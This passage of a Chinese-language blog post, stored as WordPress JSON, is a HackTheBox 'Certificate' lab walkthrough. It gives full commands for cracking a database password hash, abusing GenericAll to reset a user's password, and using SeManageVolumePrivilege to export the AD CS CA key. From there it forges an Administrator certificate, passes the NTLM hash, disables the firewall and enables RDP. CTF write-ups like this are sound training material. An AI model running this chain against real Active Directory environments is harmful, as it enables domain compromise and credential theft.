src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749091258913-55d40941-cc93-43c9-a6de-be8302d1d0ec.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u767b\u5f55\uff01<\/p>\n<p>\u767b\u5f55\u4e4b\u540e\uff0c\u70b9\u51fb\u6570\u636e\u5e93<code>certificate_webapp_db<\/code>\uff0c\u5728\u6570\u636e\u5e93\u5185\u53d1\u73b0\u4e86<code>users<\/code>\u8868\uff0c\u8868\u5185\u5b58\u50a8\u4e86\u7ad9\u70b9\u7684\u7528\u6237\u51ed\u636e\u4fe1\u606f\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749091375702-dadd2d83-769d-40d5-b84d-b61ea2bf7659.png\" alt=\"\" \/><\/p>\n<p>\u67e5\u770b\u7528\u6237\u5217\u8868\uff0c\u53d1\u73b0\u7528\u6237<code>sara.b<\/code>\u7684\u7535\u5b50\u90ae\u7bb1\u5730\u5740\u521a\u597d\u4e3a<code>certificate.htb<\/code>\uff0c\u800c<code>C:Users<\/code>\u76ee\u5f55\u4e0b\u4e5f\u521a\u597d\u5b58\u5728<code>sara.b<\/code>\u7528\u6237\u7684\u5bb6\u76ee\u5f55\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749091522102-10e087a2-52fb-4b87-a9fa-b84f24dc6b39.png\" alt=\"\" \/><\/p>\n<p>\u6000\u7591\u8be5\u7f51\u7ad9\u7528\u6237\u51ed\u636e\u548c\u64cd\u4f5c\u7cfb\u7edf\u5185\u7528\u6237\u6709\u5173\u3002\u76f4\u63a5\u4f7f\u7528<code>hashcat<\/code>\u5de5\u5177\u914d\u5408<code>rockyou.txt<\/code>\u8fdb\u884c\u7834\u89e3\uff1a<\/p>\n<pre><code class=\"language-powershell\">.\\hashcat.exe -m 3200 -a 0 \"`$2y`$04`$CgDe\/Thzw\/Em\/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6\" .\\rockyou.txt --force<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749091746899-961d8033-8b9c-45fd-a839-6d844cc29098.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u53d1\u73b0\u57df\u7528\u6237\u51ed\u636e\uff1a<\/p>\n<ul>\n<li>\u57df\uff1a<code>certificate.htb<\/code><\/li>\n<li>\u7528\u6237\u540d\uff1a<code>sara.b<\/code><\/li>\n<li>\u5bc6\u7801\uff1a<code>Blink182<\/code><\/li>\n<\/ul>\n<p>\u968f\u540e\u4f7f\u7528<code>crackmapexec<\/code>\u5bf9\u8be5\u7528\u6237\u51ed\u636e\u8fdb\u884c\u9a8c\u8bc1\uff1a<\/p>\n<pre><code class=\"language-shell\">crackmapexec smb dc01.certificate.htb -d certificate.htb -u sara.b -p \"Blink182\"\ncrackmapexec winrm dc01.certificate.htb -d certificate.htb -u sara.b -p \"Blink182\"<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749091920592-99093ccf-8a4c-4b57-8c57-9d3058dc588c.png\" alt=\"\" \/><\/p>\n<p>\u57df\u7528\u6237\u51ed\u636e\u6b63\u786e\u4e14\u5177\u6709<code>WinRM<\/code>\u767b\u5f55\u6743\u9650\uff0c\u76f4\u63a5\u4f7f\u7528<code>evil-winrm<\/code>\u767b\u5f55\uff1a<\/p>\n<pre><code class=\"language-shell\">evil-winrm -i dc01.certificate.htb -u sara.b -p \"Blink182\"<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749092043894-cb685f51-b032-4b0c-a238-182430da03e7.png\" alt=\"\" \/><\/p>\n<p><strong>\u767b\u5f55WinRM\u6210\u529f\uff01\uff01<\/strong><\/p>\n<hr \/>\n<h1>\u6743\u9650\u63d0\u5347<\/h1>\n<h2>\u57df\u5173\u7cfb\u4fe1\u606f\u6536\u96c6<\/h2>\n<p>\u767b\u5f55<code>sara.b<\/code>\u7528\u6237\u540e\uff0c\u4f7f\u7528<code>BloodHound<\/code>\u5de5\u5177\u5bf9\u9776\u673a\u57df\u73af\u5883\u8fdb\u884c\u5206\u6790\u3002\u9996\u5148\u9700\u8981\u4e0a\u4f20<code>SharpHound.ps1<\/code>\u91c7\u96c6\u811a\u672c\u6536\u96c6\u76f8\u5173\u4fe1\u606f\uff1a<\/p>\n<pre><code class=\"language-powershell\">upload ..\/..\/..\/..\/..\/opt\/BloodHound-linux-x64\/resources\/app\/Collectors\/SharpHound.ps1\nSet-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted\nImport-Module .\\SharpHound.ps1\nInvoke-BloodHound -CollectionMethod All -OutputPrefix \"sara.b\" -OutputDirectory C:\\Users\\sara.b\\Documents<\/code><\/pre>\n<p>\u6536\u96c6\u5b8c\u6bd5\u540e\uff0c\u76f4\u63a5\u4e0b\u8f7d\u91c7\u96c6\u5230\u7684\u6570\u636e\uff1a<\/p>\n<pre><code class=\"language-powershell\">ls\ndownload sara.b_20250605040605_BloodHound.zip<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749092862938-de8bbf62-b19e-4cee-bed7-b73082c46f0b.png\" alt=\"\" \/><\/p>\n<p>\u968f\u540e\u542f\u52a8<code>neo4j<\/code>\uff0c\u5e76\u5c06\u5176\u4e0a\u4f20\u81f3<code>BloodHound<\/code>\uff0c\u70b9\u51fb<code>Analysis =&gt; Find Shortest Paths to Domain Admins<\/code>\u6309\u94ae\u5217\u51fa\u57df\u5185\u6700\u77ed\u653b\u51fb\u8def\u5f84\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749093383800-832dcf68-d33e-4ac5-95d5-5b0e4ebf5b11.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0<code>Account Operators<\/code>\u7528\u6237\u7ec4\u5185\u7684\u7528\u6237\u5bf9<code>ryan.k<\/code>\u7528\u6237\u5bf9\u8c61\u5177\u6709<code>GenericAll<\/code>\u5b8c\u5168\u63a7\u5236\u6743\u9650\u3002<\/p>\n<p>\u70b9\u51fb<code>Account Operators<\/code>\u7528\u6237\u7ec4\u5bf9\u8c61\u6309\u94ae\uff0c\u67e5\u770b\u6210\u5458\u7528\u6237\uff0c\u53d1\u73b0\u5f53\u524d\u7528\u6237<code>sara.b<\/code>\u5c31\u5728\u8be5\u7528\u6237\u7ec4\u5185\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749093604101-0bd0290f-7bf9-4e02-988a-34e51861d29c.png\" alt=\"\" \/><\/p>\n<p>\u8fd9\u610f\u5473\u7740\u5f53\u524d\u7528\u6237<code>sara.b<\/code>\u53ef\u76f4\u63a5\u4fee\u6539<code>ryan.k<\/code>\u7528\u6237\u7684\u51ed\u636e\uff0c\u51b3\u5b9a\u5229\u7528\u6b64\u6761\u8def\u5f84\u8fdb\u884c\u6743\u9650\u63d0\u5347\u3002<\/p>\n<h2>GenericAll\u7528\u6237\u6743\u9650\u5229\u7528<\/h2>\n<p>\u5728\u57df\u5173\u7cfb\u4fe1\u606f\u6536\u96c6\u9636\u6bb5\uff0c\u5df2\u7ecf\u53d1\u73b0\u5f53\u524d\u7528\u6237\u53ef\u4fee\u6539<code>ryan.k<\/code>\u7528\u6237\u51ed\u636e\u7684\u60c5\u51b5\uff0c\u73b0\u5728\u76f4\u63a5\u4f7f\u7528<code>Windows<\/code>\u64cd\u4f5c\u7cfb\u7edf\u7684<code>net<\/code>\u5de5\u5177\u8fdb\u884c\u5229\u7528\uff1a<\/p>\n<pre><code class=\"language-powershell\">net user ryan.k Asd310056 \/domain<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749094162090-f624d186-4cd6-418c-b85c-ffb84a089f2b.png\" alt=\"\" \/><\/p>\n<p>\u968f\u540e\u76f4\u63a5\u767b\u5f55<code>ryan.k<\/code>\u7528\u6237\uff1a<\/p>\n<pre><code class=\"language-shell\">evil-winrm -i dc01.certificate.htb -u ryan.k -p \"Asd310056\"<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749094228006-db9bf703-4a40-400c-ad43-5ef45269c7cf.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\uff01<\/p>\n<h2>SeManageVolumePrivilege\u7279\u6743\u5229\u7528<\/h2>\n<p>\u767b\u5f55<code>ryan.k<\/code>\u7528\u6237\u540e\uff0c\u4f7f\u7528<code>whoami \/all<\/code>\u547d\u4ee4\u67e5\u770b\u5f53\u524d\u7528\u6237\u5c5e\u7ec4\u548c\u7279\u6743\u4fe1\u606f\uff0c\u53d1\u73b0\u8be5\u7528\u6237\u5f00\u542f\u4e86<code>SeManageVolumePrivilege<\/code>\u7279\u6743\u3002\u8be5\u7279\u6743\u5141\u8bb8\u7528\u6237\u6267\u884c\u78c1\u76d8\u7ef4\u62a4\u64cd\u4f5c\uff0c\u5305\u62ec\u9501\u5b9a\u6216\u88c5\u5378\u8f7d\u5377\u3001\u4fee\u6539\u5377\u6570\u636e\u3001\u788e\u7247\u6574\u7406\u4ee5\u53ca\u8fd0\u884c\u78c1\u76d8\u6e05\u7406\u5de5\u5177\u7b49\u4efb\u52a1\u3002<\/p>\n<p>\u5bf9\u4e8e\u8be5\u7279\u6743\uff0c\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528\u5982\u4e0b\u5de5\u5177\uff0c\u4ece<code>C<\/code>\u76d8\u6839\u76ee\u5f55\u5f00\u59cb\u9012\u5f52\u4fee\u6539\u7cfb\u7edf\u76d8\u5185\u4e3b\u8981\u76ee\u5f55\u7684\u8bbf\u95ee\u63a7\u5236\u4fe1\u606f\uff0c\u5e76\u901a\u8fc7\u8bfb\u53d6\u7cfb\u7edf\u5173\u952e\u6587\u4ef6\u7684\u65b9\u5f0f\u8fdb\u884c\u63d0\u6743\uff1a<a href=\"https:\/\/github.com\/CsEnox\/SeManageVolumeExploit\/releases\/download\/public\/SeManageVolumeExploit.exe\" target=\"_blank\"  rel=\"nofollow\" >CsEnox\/SeManageVolumeExploit<\/a><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749095380983-cf0a28bc-bbba-4f88-a271-e2368d3d6f50.png\" alt=\"\" \/><\/p>\n<p>\u7531\u4e8e\u9776\u673a\u4e3a<code>Windows Active Directory<\/code>\u57df\u63a7\u5236\u5668\uff0c\u7cfb\u7edf\u5185\u5fc5\u5b9a\u5b89\u88c5\u4e86<code>AD CS<\/code>\u8bc1\u4e66\u670d\u52a1\uff0c\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7<code>certutil<\/code>\u5de5\u5177\u5bfc\u51fa\u4f4d\u4e8e<code>C:\\Windows\\System32\\Certlog\\CertEnroll<\/code>\u4e0b\u8bc1\u4e66\u9881\u53d1\u673a\u6784<code>CA<\/code>\u7684\u6839\u8bc1\u4e66\uff0c\u968f\u540e\u901a\u8fc7\u8be5\u6839\u8bc1\u4e66\u5411<code>CA<\/code>\u8bf7\u6c42\u57df\u7ba1\u7406\u5458\u7528\u6237\u7684\u7528\u6237\u8bc1\u4e66\uff0c\u8fdb\u800c\u83b7\u5f97\u7ba1\u7406\u5458\u7528\u6237\u7684<code>NTLM<\/code>\u54c8\u5e0c\u503c\u5b8c\u6210\u63d0\u6743\u3002<\/p>\n<p>\u9996\u5148\u4e0b\u8f7d<code>SeManageVolumeExploit.exe<\/code>\u5de5\u5177\uff0c\u5e76\u4e0a\u4f20\u81f3\u9776\u673a\uff1a<\/p>\n<pre><code class=\"language-powershell\">upload SeManageVolumeExploit.exe<\/code><\/pre>\n<p>\u968f\u540e\u8fdb\u5165<code>CA<\/code>\u8bc1\u4e66\u76ee\u5f55\uff0c\u8fd0\u884c\u7279\u6743\u5229\u7528\u5de5\u5177\uff0c\u5e76\u5bfc\u51fa<code>CA<\/code>\u6839\u8bc1\u4e66\uff0c\u4e0b\u8f7d\u5230\u653b\u51fb\u673a\u4e0a\uff1a<\/p>\n<pre><code class=\"language-powershell\">cd C:\\Windows\\System32\\certsrv\\CertEnroll\nC:\\Users\\ryan.k\\Desktop\\SeManageVolumeExploit.exe\ncertutil -exportPFX my \"Certificate-LTD-CA\" C:\\Users\\ryan.k\\Desktop\\Certificate-LTD-CA.pfx\ndownload C:\\Users\\ryan.k\\Desktop\\Certificate-LTD-CA.pfx<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749096487928-c22f090b-dd95-466a-9615-27c28c51f83f.png\" alt=\"\" \/><\/p>\n<p><code>CA<\/code>\u6839\u8bc1\u4e66\u5bfc\u51fa\u6210\u529f\uff01\u63a5\u4e0b\u6765\u4f7f\u7528<code>certipy-ad<\/code>\u7684<code>forge<\/code>\u529f\u80fd\u8bf7\u6c42<code>Administrator<\/code>\u7528\u6237\u7684\u8bc1\u4e66\uff1a<\/p>\n<pre><code class=\"language-shell\">ntpdate -s dc01.certificate.htb\ncertipy-ad forge -ca-pfx Certificate-LTD-CA.pfx -upn Administrator@certificate.htb -out administrator.pfx<\/code><\/pre>\n<p>\u6210\u529f\u83b7\u53d6\u540e\uff0c\u4f7f\u7528<code>certipy-ad<\/code>\u7684<code>auth<\/code>\u529f\u80fd\u8fdb\u884c\u8bc1\u4e66<code>UnPAC<\/code>\u8bf7\u6c42\u5229\u7528\uff0c\u83b7\u53d6<code>Administrator<\/code>\u7528\u6237\u54c8\u5e0c\uff1a<\/p>\n<pre><code class=\"language-shell\">certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.71 -domain certificate.htb -username Administrator<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749096883244-8474b047-f059-4241-a997-11426713a0e6.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u83b7\u53d6\u57df\u7ba1\u7406\u5458\u767b\u5f55\u51ed\u636e\uff1a<\/p>\n<ul>\n<li>\u57df\uff1a<code>certificate.htb<\/code><\/li>\n<li>\u7528\u6237\u540d\uff1a<code>Administrator<\/code><\/li>\n<li><code>NTLM<\/code>\u54c8\u5e0c\uff1a<code>d804304519bf0143c14cbf1c024408c6<\/code><\/li>\n<\/ul>\n<p>\u76f4\u63a5\u4f7f\u7528<code>crackmapexec<\/code>\u6267\u884c\u547d\u4ee4\uff0c\u4fee\u6539\u5bc6\u7801\u3001\u5173\u95ed\u9632\u706b\u5899\u5e76\u6253\u5f00\u8fdc\u7a0b\u684c\u9762\uff1a<\/p>\n<pre><code class=\"language-shell\">crackmapexec smb dc01.certificate.htb -d certificate.htb -u Administrator -H \"d804304519bf0143c14cbf1c024408c6\" -x \"net user Administrator Asd310056 \/domain\"\ncrackmapexec smb dc01.certificate.htb -d certificate.htb -u Administrator -p \"Asd310056\" -x \"netsh advfirewall set allprofiles state off\"\ncrackmapexec smb dc01.certificate.htb -d certificate.htb -u Administrator -p \"Asd310056\" -x \"wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1\"<\/code><\/pre>\n<p>\u6700\u540e\u4f7f\u7528<code>xfreerdp<\/code>\u767b\u5f55\u8fdc\u7a0b\u684c\u9762\uff1a<\/p>\n<pre><code class=\"language-shell\">xfreerdp \/v:dc01.certificate.htb \/u:Administrator \/p:\"Asd310056\" \/size:1440x900<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749097502191-45ccd9f7-8008-458e-8818-c7a0eeb0d28c.png\" alt=\"\" \/><\/p>\n<p><strong>\u63d0\u6743\u6210\u529f\uff01\uff01\uff01\uff01<\/strong><\/p>\n<hr \/>\n<h1>\u672c\u6b21\u9776\u673a\u6e17\u900f\u5230\u6b64\u7ed3\u675f<\/h1>\n","protected":false},"excerpt":{"rendered":"<p>\u76ee\u6807\u4fe1\u606f IP\u5730\u5740\uff1a10.129.129.191\uff08\u975e\u56fa\u5b9aIP\u5730\u5740\uff09 \u4fe1\u606f\u6536\u96c6 ICMP\u68c0\u6d4b PING 10.129.129.191 &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[18,13],"tags":[],"class_list":["post-293","post","type-post","status-publish","format-standard","hentry","category-htb_season_8","category-windows_machine"],"_links":{"self":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/293","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/comments?post=293"}],"version-history":[{"count":7,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/293\/revisions"}],"predecessor-version":[{"id":300,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/293\/revisions\/300"}],"wp:attachment":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/media?parent=293"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/categories?post=293"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/tags?post=293"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}